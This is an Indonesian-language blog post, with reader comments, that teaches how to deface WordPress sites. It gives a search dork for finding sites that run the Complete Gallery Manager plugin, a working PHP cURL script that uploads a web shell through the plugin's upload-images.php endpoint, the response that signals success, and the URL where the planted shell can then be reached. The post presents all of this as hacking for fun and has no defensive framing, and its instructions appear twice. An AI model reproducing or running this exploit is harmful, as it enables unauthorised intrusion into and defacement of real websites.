Deface Wordpress Dengan Teknik File Upload Shell
oke langsung aja ya. 1. Pertama kalian harus udah terinstall xampp / wamp. 2. Dork: inurl:/wp-content/plugins/complete-gallery-manager/...
http://mbahroni.blogspot.com/2013/10/deface-wordpress-dengan-teknik-file.html
oke langsung aja ya.
1. Pertama kalian harus udah terinstall xampp / wamp.
2. Dork: inurl:/wp-content/plugins/complete-gallery-manager/
3. bikin exploitnya. format PHP, simpen di C:/xampp/php atau C:/wamp/bin/php/php5.4.3
Oh iya shell nya harus 1 folder sama exploit ini ya. jangan lupa target.com diganti urlnya.
4. Klik Start -> Run -> CMD
5. klik cd \xampp\php untuk xampp. atau cd \wamp\bin\php\php5.4.3 untuk wamp.
6. balik ke folder awal, kalian cari file php.ini, terus edit file nya pake notepad aja.
7. di file php.ini cari kata ;extension=php_curl.dll lalu hapus tanda ; nya. menjadi extension=php_curl.dll lalu save.
8. Kembali ke cmd, ketik php exploitnya.php klik enter
9. Jika muncul
{"success":true,"r_data":[{"name":"Full Size","url":"http:\/\/target
.com\/wp-content\/uploads\/2013\/10\/namashell.php","filename":"namashell","width":null,
"height":null}]}
Berarti sukses. tapi jika tidak muncul kode seperti itu berarti gagal.
10. Shell dapat diakses di http://target.com/wp-content/uploads/2013/10/shell.php
2013 itu tahun, 10 itu bulan.
Oke selamat hacking sodara sodara
kalo kurang jelas tanya aja lewat komentar
1. Pertama kalian harus udah terinstall xampp / wamp.
2. Dork: inurl:/wp-content/plugins/complete-gallery-manager/
3. bikin exploitnya. format PHP, simpen di C:/xampp/php atau C:/wamp/bin/php/php5.4.3
Code:
<?php
$uploadfile="namashellkalian.php";
$ch = curl_init("http://target.com/wp-content/plugins/complete-gallery-manager/frames/upload-images.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('qqfile'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
4. Klik Start -> Run -> CMD
5. klik cd \xampp\php untuk xampp. atau cd \wamp\bin\php\php5.4.3 untuk wamp.
6. balik ke folder awal, kalian cari file php.ini, terus edit file nya pake notepad aja.
7. di file php.ini cari kata ;extension=php_curl.dll lalu hapus tanda ; nya. menjadi extension=php_curl.dll lalu save.
8. Kembali ke cmd, ketik php exploitnya.php klik enter
9. Jika muncul
{"success":true,"r_data":[{"name":"Full Size","url":"http:\/\/target
.com\/wp-content\/uploads\/2013\/10\/namashell.php","filename":"namashell","width":null,
"height":null}]}
Berarti sukses. tapi jika tidak muncul kode seperti itu berarti gagal.
10. Shell dapat diakses di http://target.com/wp-content/uploads/2013/10/shell.php
2013 itu tahun, 10 itu bulan.
Oke selamat hacking sodara sodara
kalo kurang jelas tanya aja lewat komentar
saya gk hobi hacking mas...
ReplyDeletetapi nice article nya bang...
oke bang (o) (o) (o)
Deleteaku pake linux.. di simpen dimana exploidnya....soalnya folder apache q beda2 tempatnya
Deletewah, nice share gan (h)
ReplyDeleteboleh cuba buat http://indexiapk.blogspot.com